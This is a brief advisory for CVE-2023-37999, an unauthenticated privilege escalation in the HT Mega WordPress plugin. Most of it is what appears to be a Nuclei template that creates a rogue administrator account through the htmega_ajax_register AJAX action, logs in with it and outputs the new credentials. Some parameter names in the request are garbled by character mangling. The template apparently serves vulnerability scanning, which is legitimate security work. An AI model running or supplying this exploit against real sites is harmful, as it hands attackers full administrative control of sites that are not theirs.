The HT Mega plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.2.0. This is due to missing validation of the reg_role parameter on the htmega_ajax_register function. This makes it possible for unauthenticated attackers to create administrator accounts.
PoC代码[已公开]
id: CVE-2023-37999
info:
name: HT Mega – Absolute Addons for Elementor <= 2.2.0 - Missing Authorization to Privilege Escalation
author: daffainfo
severity: critical
description: |
The HT Mega plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.2.0. This is due to missing validation of the reg_role parameter on the htmega_ajax_register function. This makes it possible for unauthenticated attackers to create administrator accounts.
impact: |
Attackers can escalate privileges, gaining unauthorized access to restricted functionalities or data.
remediation: |
Update to the latest version of HT Mega to address the privilege management issue.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ht-mega-for-elementor/ht-mega-absolute-addons-for-elementor-220-missing-authorization-to-privilege-escalation
- https://plugins.trac.wordpress.org/changeset/2934204/ht-mega-for-elementor/trunk/includes/helper-function.php?contextall=1&old=2899662&old_path=%2Fht-mega-for-elementor%2Ftrunk%2Fincludes%2Fhelper-function.php
- https://patchstack.com/database/vulnerability/ht-mega-for-elementor/wordpress-ht-mega-absolute-addons-for-elementor-plugin-2-2-0-unauthenticated-privilege-escalation-vulnerability?_s_id=cve
- https://nvd.nist.gov/vuln/detail/CVE-2023-37999
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-37999
cwe-id: CWE-269
epss-score: 0.61736
epss-percentile: 0.98244
cpe: cpe:2.3:a:hasthemes:ht_mega:*:*:*:*:free:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: hasthemes
product: ht_mega
framework: wordpress
publicwww-query: "/wp-content/plugins/ht-mega-for-elementor"
tags: cve,cve2023,wordpress,wp,wp-plugin,hasthemes,ht_mega,vkev,ht-mega-for-elementor
variables:
username: "{{rand_base(6)}}"
password: "{{rand_base(8)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-admin/admin-ajax.php?action=htmega_ajax_register HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
reg_name={{username}}®_password={{password}}®_email={{email}}®_role=administrator
matchers:
- type: dsl
dsl:
- 'contains(body,"Successfully Register")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Login
matchers:
- type: dsl
dsl:
- 'contains_all(header,"wordpress_logged_in", "/wp-admin")'
- 'status_code == 302'
condition: and
extractors:
- type: dsl
dsl:
- '"Username: " + username + ". Password: "+ password'
# digest: 490a004630440220418b1f5027e61641f805f03afbaec254abbf0a2522368f7f0a2976de9e63908402202d9946246520651372e80ac2a494819402407e414423cdf7ac6c7262300015e2:922c64590222798bb761d5b6d8e72950